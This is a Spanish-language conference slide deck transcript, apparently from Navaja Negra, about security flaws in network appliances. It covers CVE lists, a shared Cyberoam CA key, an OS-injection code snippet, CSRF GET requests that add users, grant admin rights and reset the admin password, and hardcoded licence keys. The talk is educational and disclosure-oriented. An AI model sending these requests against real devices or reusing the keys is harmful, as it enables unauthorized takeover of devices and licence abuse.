all your appliances are belong to us
TRANSCRIPT
![Page 1: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/1.jpg)
CATS:ALL YOUR APPLIANCES ARE BELONG TO US
NAVAJA NEGRAConference
![Page 2: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/2.jpg)
Disclaimer
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec non risus eros. Suspendisse ac quam et augue malesuada venenatis. Fusce condimentum libero ac tellus sagittis convallis. Nullam ut enim nisl. Suspendisse tincidunt elit eget turpis consectetur mollis lacinia felis
aliquam. Esta charla es con fines educativos y de concienciación. Curabitur et libero leo, vel mattis ipsum. Mauris laoreet nibh ac mauris convallis at lacinia eros rutrum. Donec porttitor semper neque, eu fringilla mi egestas at. Donec gravida aliquam sem, sed ornare nisi euismod ut. Etiam sed odio ut nisi egestas rhoncus ut vel augue. In hac habitasse platea dictumst. Phasellus eros turpis, varius ac sodales sit amet, lobortis non elit.
![Page 3: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/3.jpg)
Dos dementes contra el mundo
Alejandro Nolla Blanco
Threat Intelligence Analyst
Apasionado del networking
@z0mbiehunt3r
Rubén Garrote García
Consultor de seguridad / Pentester
Apasionado del reversing
@boken_
Esta diapositiva está patrocinada por
![Page 4: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/4.jpg)
Agenda
Full Disclosure Vs Responsible Disclosure
¿Por qué auditar nuestros appliances?
Situación actual
Demo!
Conclusiones y recomendaciones
![Page 5: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/5.jpg)
“El trasto este viene hardenizado de serie” ¿Para qué comprometer un appliance?
Pero no toques, ¿por qué tocas?
Pero eso... será complicado, ¿no?
Yo no estoy comprometido - ¿Cómo lo sabes?
![Page 6: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/6.jpg)
¿Estás seguro de que puedes confiar ciegamente?
Pero no toques, ¿por qué tocas?
![Page 7: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/7.jpg)
![Page 8: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/8.jpg)
Out-of-the-box (in)security
![Page 9: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/9.jpg)
Out-of-the-box (in)security
Symantec Web Gateway 5.0.x.x
CVE Fallo
CVE-2012-2953 command execution
CVE-2012-2957 local file inclusion
CVE-2012-2574 Blind SQL injection
CVE-2012-2961 SQL injection
CVE-2012-2976 shell injection
CVE-2012-2977 Cambio arbitrario de credenciales
![Page 10: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/10.jpg)
Out-of-the-box (in)security
Examination of a certificate chain generated by a Cyberoam DPI device shows that all such devices share the same CA certificate and hence the same private key. It is therefore possible to intercept traffic from any victim of a Cyberoam device with any other Cyberoam device - or to extract the key from the device and import it into other DPI devices, and use those for interception.
![Page 11: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/11.jpg)
Out-of-the-box (in)security
![Page 12: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/12.jpg)
Out-of-the-box (in)security
![Page 13: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/13.jpg)
WANTED
Certificados SSL
Claves SSH
Usuarios no documentadoS
Puertas traseras
Escalada de privilegios
Fallos Web
Para más información visitar el proyecto Common Weakness Enumeration (http://cwe.mitre.org)
![Page 14: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/14.jpg)
![Page 15: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/15.jpg)
OS Injection
do_addvs()
{
# We are now going to handle a POST which is a real add
# echo "<!-post = $post>"
# vip=&port=&protocol=tcp&Commit=Add+VIP
[…]
grep -v "^%.*%" $f | sed -e "s/%PORT%/$port/" -e "s/%VIP%/$vip/" -e "s/%PROT%/$protocol/" -e "s/%NAME%/$FFF/"> $VIF[…]
}
![Page 16: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/16.jpg)
Creamos un usuario nuevoGET /config/password.php?action=edituser&t=1326400365&username=new_user&pass=new_pass&group=report&type=new&go=Add+New+User HTTP/1.1
Hacemos admin a cualquier usuario
GET /config/password.php?action=edituser&t=000&username=new_user&pass=new_pass&group=config&uid=4&go=Edit+User HTTP/1.1
Cambiamos la contraseña a cualquier usuario
GET /config/password.php?action=edituser&t=1326152517&username=admin&pass=123abc.&uid=0&go=Edit+User HTTP/1.1
Súper C RF (allí donde se le necesite)
![Page 17: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/17.jpg)
function validate_key($key) {
[...]
$keys_va_r16 = array("CrUC7e3en2cH",
"P4E5RAswaR4c",
"YaYaY5w2ZaPr",[...]
"w9E4edasuthe",
"drub8spaT7uj");
if (in_array($key, $keys_va_r16)) {cp($model_va_r16, $model_current);
}[…]
write_licence(False, 0);
echo "<center><p>Licence activated.</p></center>";
Tirando la casa por la ventana...
![Page 18: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/18.jpg)
¿Cómo encontrar estos fallos?
Auditoría tipo “caja negra” y/o “caja blanca”
Análisis estático y/o dinámico
RTFC (Read The Fucking Code)
Mediante fuzzing
![Page 19: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/19.jpg)
Consecuencias
✗ Bypass de las medidas de protección
✗ Compromiso total del dispositivo
✗ Aumento de la intrusión
✗ Interceptación del tráfico de red
![Page 20: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/20.jpg)
![Page 21: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/21.jpg)
Aumentando la intrusión - I
DMZ
RED INTERNA
INTERNET
GET /blablabla HTTP1.1
![Page 22: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/22.jpg)
Aumentando la intrusión - II
DMZ
RED INTERNA
INTERNET
Conexión SSH
![Page 23: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/23.jpg)
It's show time!
![Page 24: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/24.jpg)
Conclusiones
➢ Si auditas tus aplicaciones, ¿por qué no tus appliances?
➢ ¿Por qué implantar algo que desconocemos?
➢ En todas partes se cumplen plazos de entrega
![Page 25: All your appliances are belong to us](https://reader033.vdocument.in/reader033/viewer/2022042614/55a2cefd1a28ab014c8b4667/html5/thumbnails/25.jpg)
✔Nunca confíes ciegamente en nada
Recomendaciones
✔Disminuir la superficie de exposición
✔Revisar la infraestructura existente
✔En caso de duda, el entorno es hostil